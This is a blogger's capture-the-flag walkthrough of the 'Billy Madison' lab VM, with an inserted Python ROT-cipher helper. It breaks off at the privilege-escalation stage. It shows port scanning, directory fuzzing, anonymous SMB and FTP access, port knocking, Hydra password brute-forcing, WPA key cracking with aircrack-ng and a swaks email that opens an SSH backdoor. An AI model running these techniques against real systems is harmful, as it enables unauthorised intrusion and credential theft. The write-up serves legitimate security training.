I was feeling like dusting off my 1337h4x sk1llz. Since I quit my job I haven’t been actively tinkering with computers anymore and my hands were itching for a challenge. So I hopped on the Interwebs in search of some CTF action and came across this gem: https://www.vulnhub.com/entry/billy-madison-11,161/
Name: Billy Madison: 1.1
Date release: 14 Sep 2016
Author: Brian Johnson
Series: Billy Madison
Web page: https://7ms.us/billymadison/
It was a bit tricky to get through for me and my crappy Linux skills. I did not want to use walkthroughs unless absolutely necessary, but thanks to Google, GitHub and whatnot, and a couple of helpful tips from Brian @7MinSec, I got through it alright.
Oh, and I wrote a tool for lulz to encrypt, decrypt or brute-force ROT ciphers in Python, which I’ll maybe post later on (once I’m happy with how it works overall).
Anywho, back to the VM. Let’s get cracking!
Side-note: The VM was hosted on ESX 6 and this was all pwned using Kali 2016.2
Plot: Help Billy Madison stop Eric from taking over Madison Hotels!
Sneaky Eric Gordon has installed malware on Billy’s computer right before the two of them are set to face off in an academic decathlon. Unless Billy can regain control of his machine and decrypt his 12th grade final project, he will not graduate from high school. Plus, it means Eric wins, and he takes over as head of Madison Hotels!
Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.
# So it begins!
Ok, the VM presents me with a login screen! Good, it boots:
```
Ubuntu 16.04.1 LTS BM tty1
BM Login:
```
## Who dis? Info gathering.
Let’s go for some broad-spectrum intel gathering.
```
nmap -p 1-65535 -T4 -A -v -Pn 192.168.1.16

Starting Nmap 7.00 ( https://nmap.org ) at 2016-09-26 20:49 W. Europe Daylight Time
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating ARP Ping Scan at 20:49
Scanning 192.168.1.16 [1 port]
Completed ARP Ping Scan at 20:49, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:49
Completed Parallel DNS resolution of 1 host. at 20:49, 0.00s elapsed
Initiating SYN Stealth Scan at 20:49
Scanning BM.fritz.box (192.168.1.16) [65535 ports]
Discovered open port 23/tcp on 192.168.1.16
Discovered open port 22/tcp on 192.168.1.16
Discovered open port 139/tcp on 192.168.1.16
Discovered open port 80/tcp on 192.168.1.16
Discovered open port 445/tcp on 192.168.1.16
SYN Stealth Scan Timing: About 23.25% done; ETC: 20:51 (0:01:42 remaining)
SYN Stealth Scan Timing: About 59.15% done; ETC: 20:51 (0:00:42 remaining)
Discovered open port 2525/tcp on 192.168.1.16
Discovered open port 69/tcp on 192.168.1.16
Completed SYN Stealth Scan at 20:50, 88.47s elapsed (65535 total ports)
Initiating Service scan at 20:50
Scanning 7 services on BM.fritz.box (192.168.1.16)
Completed Service scan at 20:51, 23.50s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against BM.fritz.box (192.168.1.16)
NSE: Script scanning 192.168.1.16.
Initiating NSE at 20:51
Completed NSE at 20:51, 40.04s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Nmap scan report for BM.fritz.box (192.168.1.16)
WARNING: RST from 192.168.1.16 port 23 -- is this port really open?
WARNING: RST from 192.168.1.16 port 23 -- is this port really open?
WARNING: RST from 192.168.1.16 port 23 -- is this port really open?
WARNING: RST from 192.168.1.16 port 23 -- is this port really open?
WARNING: RST from 192.168.1.16 port 23 -- is this port really open?
WARNING: RST from 192.168.1.16 port 23 -- is this port really open?
Host is up (0.000027s latency).
Not shown: 65526 filtered ports
PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
|_http-generator: WordPress 1.0
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: MadisonHotelsWordpress
|_http-title: Welcome | Just another WordPress site
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Oh nooooooo!
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn Samba smbd 3.X (workgroup: BM)
445/tcp  open   netbios-ssn Samba smbd 3.X (workgroup: BM)
2525/tcp open   smtp
| smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok,
|_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP ". End of HELP info
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port23-TCP:V=7.00%I=7%D=9/30%Time=57EEB40C%P=i686-pc-windows-windows%r(
SF:NULL,E6,"\n\n\*\*\*\*\*\x20HAHAH!\x20You're\x20banned\x20for\x20a\x20wh
SF:ile,\x20Billy\x20Boy!\x20\x20By\x20the\x20way,\x20I\x20caught\x20you\x2
SF:0trying\x20to\x20hack\x20my\x20wifi\x20-\x20but\x20the\x20joke's\x20on\
SF:x20you!\x20I\x20don't\x20use\x20ROTten\x20passwords\x20like\x20rkfpuzra
SF:hngvat\x20anymore!\x20Madison\x20Hotels\x20is\x20as\x20good\x20as\x20MI
SF:NE!!!!\x20\*\*\*\*\*\n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2525-TCP:V=7.00%I=7%D=9/30%Time=57EEB412%P=i686-pc-windows-windows%
SF:r(NULL,1F,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n")%r(GetRequest
SF:,5A,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error:\x20comm
SF:and\x20not\x20implemented\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Gen
SF:ericLines,4D,"220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n500\x20Error
SF::\x20bad\x20syntax\r\n500\x20Error:\x20bad\x20syntax\r\n")%r(Help,13D,"
SF:220\x20BM\x20ESMTP\x20SubEthaSMTP\x20null\r\n214-SubEthaSMTP\x20null\x2
SF:0on\x20BM\r\n214-Topics:\r\n214-\x20\x20\x20\x20\x20HELP\r\n214-\x20\x2
SF:0\x20\x20\x20HELO\r\n214-\x20\x20\x20\x20\x20RCPT\r\n214-\x20\x20\x20\x
SF:20\x20MAIL\r\n214-\x20\x20\x20\x20\x20DATA\r\n214-\x20\x20\x20\x20\x20A
SF:UTH\r\n214-\x20\x20\x20\x20\x20EHLO\r\n214-\x20\x20\x20\x20\x20NOOP\r\n
SF:214-\x20\x20\x20\x20\x20RSET\r\n214-\x20\x20\x20\x20\x20VRFY\r\n214-\x2
SF:0\x20\x20\x20\x20QUIT\r\n214-\x20\x20\x20\x20\x20STARTTLS\r\n214-For\x2
SF:0more\x20info\x20use\x20\"HELP\x20\"\.\r\n214\x20End\x20of\x20HE
SF:LP\x20info\r\n");
MAC Address: 00:0C:29:A5:98:2F (VMware)
Device type: general purpose
Running: OpenBSD 4.X
OS CPE: cpe:/o:openbsd:openbsd:4.4
OS details: OpenBSD 4.4
Network Distance: 1 hop

Host script results:
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: bm
|   NetBIOS computer name: BM
|   Domain name:
|   FQDN: bm
|_  System time: 2016-09-26T13:51:33-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

TRACEROUTE
HOP RTT      ADDRESS
1   0.03 ms  BM.fritz.box (192.168.1.16)

NSE: Script Post-scanning.
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Read data files from: F:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds
           Raw packets sent: 131162 (5.774MB) | Rcvd: 86 (3.656KB)
```
So we have Telnet, SSH, HTTP on 69 and 80, SMB, and SMTP on 2525.
```
ncat -v 192.168.1.16 23
Ncat: Version 7.25BETA2 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.1.16:23.

***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****
```
OH ERIC U FUNNY! But the ROT10 is a password and might lead further. So I find me a ROT tool online and stumble across a way to do it with `tr`:
```
ROT-1 = tr 'b-za-aB-ZA-A' 'a-zA-Z'
ROT-2 = tr 'c-za-bC-ZA-B' 'a-zA-Z'
ROT-3 = tr 'd-za-cD-ZA-C' 'a-zA-Z'
etc. etc.
```
But I dunno what I’m looking for exactly so I want a wordlist with all possibilities. For now I have a list from the web, but this would be relatively easy to make and I was looking to do something useful in Python. And that’s how my c1ph3r.py tool was born.
```
qjeotyqzgmfuzs
pidnsxpyfletyr
ohcmrwoxekdsxq
ngblqvnwdjcrwp
mfakpumvcibqvo
lezjotlubhapun
kdyinsktagzotm
jcxhmrjszfynsl
ibwglqiryexmrk
havfkphqxdwlqj
gzuejogpwcvkpi
fytdinfovbujoh
exschmenuating
dwrbgldmtzshmf
cvqafkclsyrgle
bupzejbkrxqfkd
atoydiajqwpejc
zsnxchzipvodib
yrmwbgyhouncha
xqlvafxgntmbgz
wpkuzewfmslafy
vojtydvelrkzex
unisxcudkqjydw
tmhrwbtcjpixcv
slgqvasbiohwbu
rkfpuzrahngvat
```
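As an added example (not the author's c1ph3r.py, which isn't posted here), a small Python module that does what the `tr` one-liners and the wordlist above do: rotate text by any shift, regenerate the 26 candidates in the same order as the list, recover the shift between two words, and spell out the matching `tr` SET arguments.

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def rot(text, shift):
    """Shift every ASCII letter by `shift` positions (ROT-N / Caesar).

    Negative shifts rotate backwards, case is preserved and anything that
    is not a letter passes through unchanged, so whole banners can be fed in.
    """
    shift %= 26
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def tr_sets(k):
    """The two SET arguments for `tr` that undo a forward shift of k,
    in the form the walkthrough uses (ROT-1 = tr 'b-za-aB-ZA-A' 'a-zA-Z')."""
    if not 1 <= k <= 25:
        raise ValueError("k must be between 1 and 25")
    # The source set starts k letters in, wraps at z/Z and ends one letter before the start.
    src = f"{LOWER[k]}-za-{LOWER[k - 1]}{UPPER[k]}-ZA-{UPPER[k - 1]}"
    return src, "a-zA-Z"


def rot_wordlist(word):
    """All 26 rotations of `word`, ordered like the list in the post:
    shifted back by 1, 2, ..., 25 and finally by 26 (the word itself)."""
    return [rot(word, -k) for k in range(1, 27)]


def find_shift(cipher, plain):
    """Forward shift that turns `cipher` into `plain`, or None if no rotation does."""
    for k in range(26):
        if rot(cipher, k) == plain:
            return k
    return None


if __name__ == "__main__":
    # Eric's banner word from the telnet greeting, one candidate per line,
    # ready to be redirected into a wordlist file for wfuzz.
    for candidate in rot_wordlist("rkfpuzrahngvat"):
        print(candidate)
```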
```
ssh 192.168.1.16
ssh_exchange_identification: Connection refused by remote host
```
No dice. Probably something monitoring the port too.
# WordPress 1.0 on :69
Since the WP version is from the Dark Ages, let’s run the WordPress Security Scanner against it and see what’s what.
```
wpscan --url http://192.168.1.16:69/
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
Y
[+] URL: http://192.168.1.16:69/
[+] Started: Sat Sep 10 22:56:29 2016

[!] The WordPress 'http://192.168.1.16:69/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under: http://192.168.1.16:69/xmlrpc.php

[+] WordPress version 1.0 identified from meta generator (Released on 2004-01-03)

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Latest version: 2.5
 |  Location: http://192.168.1.16:69/wp-content/themes/twentyeleven/
 |  Readme: http://192.168.1.16:69/wp-content/themes/twentyeleven/readme.txt
 |  Changelog: http://192.168.1.16:69/wp-content/themes/twentyeleven/changelog.txt
 |  Style URL: http://192.168.1.16:69/wp-content/themes/twentyeleven/style.css
 |  Referenced style.css: http://192.168.1.16:69/static/wp-content/themes/twentyeleven/style.css

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Sat Sep 10 22:56:29 2016
[+] Requests Done: 59
[+] Memory used: 15.312 MB
[+] Elapsed time: 00:00:00
```
Nothing special. Enumerating the users via /?author=1 and /?author=2 I can only find one account: admin. Noted. This smells funny though. Nothing from my ROT list works here. It doesn’t really look promising, so I’ll move on for now to web service number 2.
# Apache on :80
So visiting the webpage renders a funny defaced site. Silly Billy!!! Eric has no love for Billy.
“Good luck, schmuck.”
So I check the page and see nothing special in code or in the images. Let’s fuzz the site with the ROT10 list.
```
wfuzz -c -w /root/hacking/BM/ROT.wls --hc=404 http://192.168.1.13/FUZZ

********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://192.168.1.13/FUZZ
Total requests: 26

==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

00015:  C=301      9 L       28 W          321 Ch        "exschmenuating"

Total time: 0.110656
Processed Requests: 26
Filtered Requests: 25
Requests/sec.: 234.960
```
SHWEET! The site “exschmenuating” was found. Visiting http://192.168.1.16/exschmenuating renders a page with “Ruin Billy Madison’s Life” – Eric’s notes. And also a link to http://192.168.1.13/exschmenuating/currently-banned-hosts.txt which lists my host as blocked.
```
---
2016-09-30-15-10-01
Hosts currently banned
Chain INPUT (policy DROP)
DROP       all  --  192.168.1.25         anywhere
---
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.
---
```
Senpai has noticed me. No worries, I’ll change my ifconfig-ables once I go attack-mode.
Another interesting bit of info is the 08/03/16 entry:
```
08/03/16

OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine!
```
Thank you, Eric – for putting a .cap file on here with Veronica’s name in there.
First – make a wordlist to use with dirbuster to find the .cap (maybe .pcap). As a source I’m gonna use one of the largest standard wordlists included in Kali: rockyou.txt.
```
grep veronica /usr/share/wordlists/rockyou.txt > veronica.wls
```
Next – I throw the thing into dirbuster (GUI) to look for a *veronica* named .cap or .pcap file, aaaaaand bingo: 012987veronica.cap found!
After downloading “012987veronica.cap” and filtering the TCP streams in Wireshark you’ll find several e-mails detailing how Eric pwns Veronica through a little bit of ‘Social Engineering’.
The most important emails refer to a “Spanish Armada” combo and contain FTP credentials for Eric:
```
Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it. Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

-VV
.
QUIT
=========================================================
EHLO kali
MAIL FROM:<email@example.com>
RCPT TO:<firstname.lastname@example.org>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: email@example.com
From: firstname.lastname@example.org
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

RE: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric
.
QUIT
```
So Billy’s got a thing for numbers, huh? The YouTube video references a sequence of years/numbers after the words “Spanish Armada”: 1466 67 1469 1514 1981 1986.
Eric clearly doesn’t have a thing for pee.
Last I checked no FTP port was open. Let’s check SMB first before I dig into FTP.
# Samba! Samba de Server Message Block!
https://www.youtube.com/watch?v=Bx1iclqbNyM
Ah SMB. CIFS. Very familiar stuff – let’s check for shares.
```
smbmap -H 192.168.1.16
[+] Finding open SMB ports....
[+] Guest SMB session established on 192.168.1.6...
[+] IP: 192.168.1.16:445        Name: BM.fritz.box
        Disk                                    Permissions
        ----                                    -----------
        EricsSecretStuff                        READ ONLY
        IPC$                                    NO ACCESS
```
nmap told us a guest account was used for the check, so let’s connect anonymously.
```
smbclient -N //192.168.1.16/EricsSecretStuff
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Sat Sep 10 23:27:10 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Sat Sep 10 23:27:10 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

                30291996 blocks of size 1024. 25800892 blocks available
smb: \>
```
Noice. Get teh supplies. Drop teh supplies.
```
smb: \> mget *.*
Get file ._.DS_Store? y
getting file \._.DS_Store of size 4096 as ._.DS_Store (1999.9 KiloBytes/sec) (average 475.8 KiloBytes/sec)
Get file ebd.txt? y
getting file \ebd.txt of size 35 as ebd.txt (17.1 KiloBytes/sec) (average 469.1 KiloBytes/sec)
Get file .DS_Store? y
getting file \.DS_Store of size 6148 as .DS_Store (3001.8 KiloBytes/sec) (average 505.5 KiloBytes/sec)
smb: \> exit
root@kali:~/hacking/BM# cat ebd.txt
Erics backdoor is currently CLOSED
```
So there’s a monitored backdoor. With the sequence and all that sounds like a port knock to me.
Let’s try a port knocking sequence with the Spanish Armada numbers as ports.
```
for K in 1466 67 1469 1514 1981 1986; do nmap -Pn --max-retries 0 -p $K 192.168.1.16; done
```
After all the packets are sent, scan to see if the port is up.
```
nmap -Pn -p 21 -A 192.168.1.16

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-30 23:24 CEST
Nmap scan report for 192.168.1.16
Host is up (0.00046s latency).
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
|_ftp-bounce: bounce working!
```
Fantastic! Anonymous login is also allowed. So let’s start there.
```
ftp 192.168.1.16
Connected to 192.168.1.16.
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name (192.168.1.16:root): anonymous
331 Guest login okay, send your complete e-mail address as password.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp      141 Aug 15 09:19 Billys-12th-grade-final-project.doc
226 Transfer completed.
ftp> get Billys-12th-grade-final-project.doc
local: Billys-12th-grade-final-project.doc remote: Billys-12th-grade-final-project.doc
200 PORT command successful.
150 Opening A mode data connection for Billys-12th-grade-final-project.doc.
226 Transfer completed for "Billys-12th-grade-final-project.doc".
145 bytes received in 0.25 secs (0.5690 kB/s)
ftp> quit
221 Logged out, closing control connection.

cat Billys-12th-grade-final-project.doc
HHAHAAHAHAH I CAN'T BELIEVE YOU ACTUALLY THOUGHT THIS WAS IT!!!!

WHAT A LOSER!

Why don't you go pass out by the pool for another hour!

-EG
```
Let’s move on to Eric’s FTP. Log in with user “eric” and password “ericdoesntdrinkhisownpee”.
```
ftp> ls -lah
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp     6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp     5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp      868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp     5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp     1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp     9132 Aug 20 12:49 40054
226 Transfer completed.
```
I mget all of these files and start digging.
First of all I check out the content of the .notes file.
```
cat .notes
Ugh, this is frustrating.  I managed to make a system account for myself.  I also managed to hide Billy's paper where he'll never find it.  However, now I can't find it either :-(.

To make matters worse, my privesc exploits aren't working.  One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  All I need to do is send an email that includes the text:

"My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to check Veronica's.

-EG
```
The answer is “soccer player”. It’s clear we need to send him an e-mail with “My kid will be a soccer player” in the body and header to open Eric’s SSH backdoor. We’ll get to SMTP soon enough. The other files provide background info on the exploit and how you can try to use it. But first I wanna hack all the things, so I reckon there are accounts for Billy and Veronica. Let’s start with Veronica and let’s also assume her name is in the password.
# Fire up the Hydra!
```
hydra -l veronica -P veronica.wls ftp://192.168.1.16
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-28 20:14:27
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~0 tries per task
[DATA] attacking service ftp on port 21
[ftp] host: 192.168.1.13   login: veronica   password: email@example.com
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-28 20:14:56
```
Yup, we were right. First we get cookies and chill because: easy h4x, easy life. Then we login with her creds.
The first time I logged in and pulled all her files the .cap file was corrupt. I asked myself: by design or something else? I looked at the file with a hex editor. That didn’t help – but it did get me the ESSID: EricGordon. Turns out I had not thought to set the transfer mode to BINARY!! Cheers, Brian \^^/
```
ftp> binary
200 Type set to I
ftp> ls -lah
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp   719128 Aug 17 12:16 eg-01.cap
-rwxrwxrwx 1 ftp      595 Aug 20 12:55 email-from-billy.eml
226 Transfer completed.
ftp>
```
I mget all of her files. Let’s start by checking out the e-mail from Billy:
```
cat email-from-billy.eml
Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: firstname.lastname@example.org
From: email@example.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.  I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,
Billy
```
I also started a Hydra session for billy, but with a big wordlist and the limited number of tasks I could run, I gave up on it in pursuit of r00t.
Dirty Billy left a bag of flaming poo and captured eg-01.cap which contains EricGordon’s password. Good times all around. Let’s crack!
# Flaming bag of Aircrack-ng
Using the same wordlist I put aircrack-ng to work on the .cap
```
aircrack-ng -a 2 -e EricGordon -w /usr/share/wordlists/rockyou.txt eg-01.cap
Opening eg-01.cap
Read 13003 packets.
Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:05:09] 1699636/9822768 keys tested (5674.90 k/s)

      Time left: 23 minutes, 51 seconds                         17.30%

                           KEY FOUND! [ triscuit* ]

      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33
```
So the login creds for the SSH:1974 backdoor will be user “eric” with password “triscuit*”
# Last stop on the list: SMTP
EHLO friend. We’re gonna make Eric send himself a mail with “My kid will be a soccer player” in the body and header to activate his SSH backdoor.
You can do this via telnet and punch in the commands yourself, or use swaks:
```
swaks -t firstname.lastname@example.org -f email@example.com -s 192.168.1.16:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"
=== Trying 192.168.1.13:2525...
=== Connected to 192.168.1.13.
EHLO kali
MAIL FROM:<firstname.lastname@example.org>
RCPT TO:<email@example.com>
DATA
.
 -> Date: Sat, 01 Oct 2016 01:36:59 +0200
 -> To: firstname.lastname@example.org
 -> From: email@example.com
 -> Subject: My kid will be a soccer player
 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
 ->
 -> My kid will be a soccer player
 ->
 -> .
QUIT
```
So now the SSH backdoor should be open. Let’s do another scan.
```
1974/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f2:02:a4:3b:8f:84:a2:fd:28:53:e5:2d:a2:63:90:48 (RSA)
|_  256 31:60:85:b5:93:da:92:9e:90:a2:d0:a7:c4:51:42:8e (ECDSA)
```
# The (back)gates are open
Let’s see what Eric has been up to here – saving Madison Hotels from certain doom and retrieve Billy’s homework.
```
ssh -p 1974 firstname.lastname@example.org
email@example.com's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

37 packages can be updated.
0 updates are security updates.

Last login: Sat Aug 20 22:28:28 2016 from 192.168.3.105
eric@BM:~$
```
Great success! Let’s have a look at what Eric keeps in his home folder.
```
eric@BM:~$ ls -lah
total 532K
drwxr-xr-x 3 eric eric 4.0K Aug 23 00:18 .
drwxr-xr-x 6 root root 4.0K Aug 20 13:56 ..
-rw-r--r-- 1 eric eric  220 Aug 20 13:56 .bash_logout
-rw-r--r-- 1 eric eric 3.7K Aug 20 13:56 .bashrc
drwx------ 2 eric eric 4.0K Aug 20 14:07 .cache
-rw-r--r-- 1 root root 441K Aug  7 22:31 eric-tongue-animated.gif
-rw-r--r-- 1 root root  60K Aug  7 22:29 eric-unimpressed.jpg
-rw-r--r-- 1 eric eric  655 Aug 20 13:56 .profile
-rw-r--r-- 1 root root  115 Aug 20 20:41 why-1974.txt
eric@BM:~$ cat why-1974.txt
Why 1974? Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/
```
We’ve got a reason for the port number and some pics. I quickly scp’ed them to storage elsewhere for safekeeping and documentation.
# Time to PWN!!1!
The documentation and code Eric used for exploiting Billy’s machine reference a vulnerability in the reference counting of the kernel’s struct file that allows writing data to a read-only file. The exploit creates a writable file descriptor, starts a write operation on it, waits for the kernel to verify the file’s writability, then frees the writable file and opens a read-only file that gets allocated in the same place before the kernel writes into the freed file. That lets an attacker possibly obtain r00t, for example by writing a cron job.
Ok, now – how do we look for this? After sleeping on it for a night and reading up on some things I settled on the logic that Eric must have gotten the file owner’s permissions, as well as the owner’s UID and GID, when executing the exploit. If that happened in a folder where he normally does not have those rights, they’ll show up as elevated SUID permissions.
Let’s have a find.
```
eric@BM:~$ find / -user root -perm -4000 -ls 2>/dev/null
1454477 368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
1048829 136 -rwsr-xr-x   1 root     root       136808 May  4 12:25 /usr/bin/sudo
1058216  24 -rwsr-xr-x   1 root     root        23376 Jan 17  2016 /usr/bin/pkexec
1048745  56 -rwsr-xr-x   1 root     root        54256 Mar 29 04:25 /usr/bin/passwd
1057557  36 -rwsr-xr-x   1 root     root        32944 Mar 29 04:25 /usr/bin/newgidmap
1048609  40 -rwsr-xr-x   1 root     root        40432 Mar 29 04:25 /usr/bin/chsh
1048670  76 -rwsr-xr-x   1 root     root        75304 Mar 29 04:25 /usr/bin/gpasswd
1057558  36 -rwsr-xr-x   1 root     root        32944 Mar 29 04:25 /usr/bin/newuidmap
1048734  40 -rwsr-xr-x   1 root     root        39904 Mar 29 04:25 /usr/bin/newgrp
1048607  52 -rwsr-xr-x   1 root     root        49584 Mar 29 04:25 /usr/bin/chfn
1058246  24 -rwsr-xr-x   1 root     root        23288 Apr 29 11:02 /usr/bin/ubuntu-core-launcher
1048930  12 -rwsr-xr-x   1 root     root        10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
1057498  40 -rwsr-xr-x   1 root     root        38984 Jun 30 02:28 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
1318420  16 -rwsr-xr-x   1 root     root        14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
1066069 420 -rwsr-xr-x   1 root     root       428240 Aug 11 11:25 /usr/lib/openssh/ssh-keysign
1056767  44 -rwsr-xr--   1 root     messagebus  42992 Apr  1 11:41 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
